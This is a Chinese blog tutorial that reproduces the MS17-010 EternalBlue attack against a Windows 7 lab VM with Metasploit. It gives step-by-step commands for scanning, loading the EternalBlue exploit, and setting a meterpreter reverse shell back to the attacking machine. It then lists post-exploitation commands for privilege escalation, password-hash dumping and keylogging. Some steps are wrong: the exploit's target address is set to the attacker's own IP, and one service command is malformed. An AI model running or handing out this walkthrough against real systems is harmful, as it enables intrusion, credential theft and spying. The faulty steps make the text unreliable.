使用msf复现ms17-010永恒之蓝
**** 复现永恒之蓝****
一,准备工作:
1. kali系统:
可以直接装在物理机上,也可以装在VMware虚拟机上。(个人推荐装在虚拟机上)
2. 信息收集工作:
1)获取目标机地址:192.168.1.68
我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。
2)获取攻击机地址:192.168.1.6
这里指kali系统的IP,在终端输入ifconfig查看。
二,配置ms17-010
使用msf需要先启动数据库:
命令在终端输入systemctl start postgresql
如果嫌每次都要启动太麻烦可以设置开机自启动:
命令:system enable postgresql
1. 下面进入meatsploit框架:
进入命令:msfconsole 。 显示msf5> 表示成功进入。
2. 首先查找ms17-010所有的模块
我们可以看到下面的模块:
攻击一台设备,先要进行测试,了解我们所攻击的目标机是否存在这个漏洞。
1)使用辅助模块进行测试。
查找
使用
2)配置模块信息
查看命令:show options 配置目标机IP命令:set RHOSTS 192.168.1.68
3)执行run或exploit
测试目标机存在漏洞后,开始正式攻击。back退出模块。
1. 查找ms17-010的攻击模块。
命令:msf5>search ms17-010 找到exploit / windows / smb / ms17_010_eternalblue
2. 加载漏洞的攻击模块。
使用攻击模块
3.查看攻击模块需要设置的参数。
4)设置目标机命令:set RHOSTS 192.168.1.6
攻击只是一种手段,最重要的是要拿到对方的权限。我们可以利用攻击载荷模块(payload)让目标机在受到攻击后,返回一个shell给攻击机,让它们之间建立一个通道。
1)查找我们要用的攻击载荷模块。
命令:search payload / windows / x64 / meterpreter / reverse_tcp
2)将它加载进攻击模块。
命令:set payload windows / x64 / meterpreter / reverse_tcp
3)设置攻击机(LHOST)用于接收会话
命令:set LHOST 192.168.1.6
最后执行run或exploit进行攻击。
成功后可以输入sysinfo查看目标机的系统信息。
可使用一下命令:
help 查看帮助
getsystem 提升权限
shell 进入对方的命令终端
hashdump 获取密码hash值
keyscan_start 打开记录键盘
keyscan_dump 记录键盘
keyscan_stop 关闭记录键盘
- 点赞 1
- 收藏
- 分享
- 文章举报
- MSF使用MS17-010
- 【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法
- 使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
- 永恒之蓝 ms17_010漏洞的利用 msf
- ms17-010 利用msf的exp和一个扫描工具的复现
- 阿布在漏洞复现---永恒之蓝 MS17-010
- MS17-010永恒之蓝复现
- 永恒之蓝漏洞复现(ms17-010) 及windows日志对比分析
- 试试MSF的ms17-010永恒之蓝漏洞利用
- MS17-010(永恒之蓝)漏洞复现
- ms17-010永恒之蓝漏洞复现
- 关于 永恒之蓝 和 MS17-010 补丁
- smb(ms17-010)远程命令执行之msf
- 基于MS17_010(永恒之蓝)的一次渗透测试
- ms17-010漏洞复现
- 【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
- ms17-010复现
- MS17-010 "Eternal Blue(永恒之蓝)”, 修复补丁下载汇总地址!
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用